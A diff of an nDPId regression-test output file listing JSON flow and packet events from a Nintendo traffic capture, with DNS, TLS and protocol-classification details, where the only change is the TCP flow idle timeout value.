00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1500731323269,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731323269,"pkt":"AA6OGXEMfLuKifuECABFAABoEV8AAEARLjHAqAxyI55KPcuXgjcAVAoAMquYZAIAAACgRQAAPD+rAYcrvhgZcqXY4tF4R087lVXf\/uabOP7DTtPl\/Z68o2TwyTMiy\/1PT8Q0PYJjfL9\/FaWie4QujpeJZMzmHA=="} 00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731323269,"flow_last_seen":1500731323269,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731323269,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 
@@ -31,16 +31,16 @@ 00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326599,"flow_last_seen":1500731326599,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731326599,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1500731326628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1500731326628,"pkt":"fLuKifuEAA6OGXEMCABFAAELMF9AAEARb7\/AqAwBwKgMcgA1SboA95AtAEmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAeAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAAPAAENsAb2cBQAAEAAQAAADwABDbAG8TAUAABAAEAAAA8AAQ2wBsnwFAAAQABAAAAPAAENsAbUcBQAAEAAQAAADwABDbAG0rAUAABAAEAAAA8AAQ2wBuuwFAAAQABAAAAPAAENsAbaMBQAAEAAQAAADwABDbAGwg="} 
00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731326628,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.217"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326644,"flow_last_seen":1500731326644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731326644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1500731326644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326644,"pkt":"AA6OGXEMfLuKifuECABFAAA8EXNAAEAGCZbAqAxyNsAb2aItAbvSLGpEAAAAAKACgABWsQAAAgQFUAEDAwYEAggKABpxjAAAAAA="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1500731326676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326676,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZgg2wBvZwKgMcgG7oi3AHA3T0ixqRaAScSCE4wAAAgQFrAQCCAqn0Wp9ABpxjAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1500731326680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731326680,"pkt":"AA6OGXEMfLuKifuECABFAAA0EXRAAEAGCZ3AqAxyNsAb2aItAbvSLGpFwBwN1IAQAg4imAAAAQEICgAaca+n0Wp9"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731329336,"flow_last_seen":1500731329336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731329336,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1500731329336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329336,"pkt":"AA6OGXEMfLuKifuECABFAAAoEX5AAEAGM1vAqAxyNpLySi0OAbv6FA+Od8xLzVAQEsCrFwAA"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329520,"pkt":"fLuKifuEAA6OGXEMCABFAAAo9shAACwGYhA2kvJKwKgMcgG7LQ53zEvN+hQPj1AQn2AedgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326644,"flow_last_seen":1500731326644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731326644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1500731326644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326644,"pkt":"AA6OGXEMfLuKifuECABFAAA8EXNAAEAGCZbAqAxyNsAb2aItAbvSLGpEAAAAAKACgABWsQAAAgQFUAEDAwYEAggKABpxjAAAAAA="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1500731326676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326676,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZgg2wBvZwKgMcgG7oi3AHA3T0ixqRaAScSCE4wAAAgQFrAQCCAqn0Wp9ABpxjAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1500731326680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731326680,"pkt":"AA6OGXEMfLuKifuECABFAAA0EXRAAEAGCZ3AqAxyNsAb2aItAbvSLGpFwBwN1IAQAg4imAAAAQEICgAaca+n0Wp9"} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731329336,"flow_last_seen":1500731329336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731329336,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1500731329336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329336,"pkt":"AA6OGXEMfLuKifuECABFAAAoEX5AAEAGM1vAqAxyNpLySi0OAbv6FA+Od8xLzVAQEsCrFwAA"} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1500731329520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329520,"pkt":"fLuKifuEAA6OGXEMCABFAAAo9shAACwGYhA2kvJKwKgMcgG7LQ53zEvN+hQPj1AQn2AedgAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340826,"flow_last_seen":1500731340826,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731340826,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1500731340826,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1500731340826,"pkt":"AA6OGXEMfLuKifuECABFAAAsEYIAAEARLkrAqAxyI55KPdprgjYAGGgmAAAAAAAAAAAAAAAAAAAAAA=="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1500731340826,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1500731340826,"pkt":"AA6OGXEMfLuKifuECABFAAAsEYMAAEARLknAqAxyI55KPdprgjYAGGgmAAAAAAAAAAAAAAAAAAAAAA=="} 
@@ -68,15 +68,15 @@ 00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1500731341194,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1500731341194,"pkt":"fLuKifuEAA6OGXEMCABFAAELN\/tAAEARaCPAqAwBwKgMcgA1x1sA9yl7YWmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAPAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAALQAENsAbCMBQAAEAAQAAAC0ABDbAG2jAUAABAAEAAAAtAAQ2wBuuwFAAAQABAAAALQAENsAbSsBQAAEAAQAAAC0ABDbAG1HAUAABAAEAAAAtAAQ2wBsnwFAAAQABAAAALQAENsAbxMBQAAEAAQAAAC0ABDbAG9k="} 
00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.8"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341201,"flow_last_seen":1500731341201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731341201,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1500731341201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341201,"pkt":"AA6OGXEMfLuKifuECABFAAA8EZZAAEAGCkTAqAxyNsAbCHphAbtX9RrxAAAAAKACgAAP+wAAAgQFUAEDAwYEAggKABqqagAAAAA="} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1500731341241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341241,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZtk2wBsIwKgMcgG7emF9lpyBV\/Ua8qAScSBo2gAAAgQFrAQCCAqoOPNAABqqagEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1500731341242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731341242,"pkt":"AA6OGXEMfLuKifuECABFAAA0EZdAAEAGCkvAqAxyNsAbCHphAbtX9RryfZacgoAQAg4GiQAAAQEICgAaqpOoOPNA"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
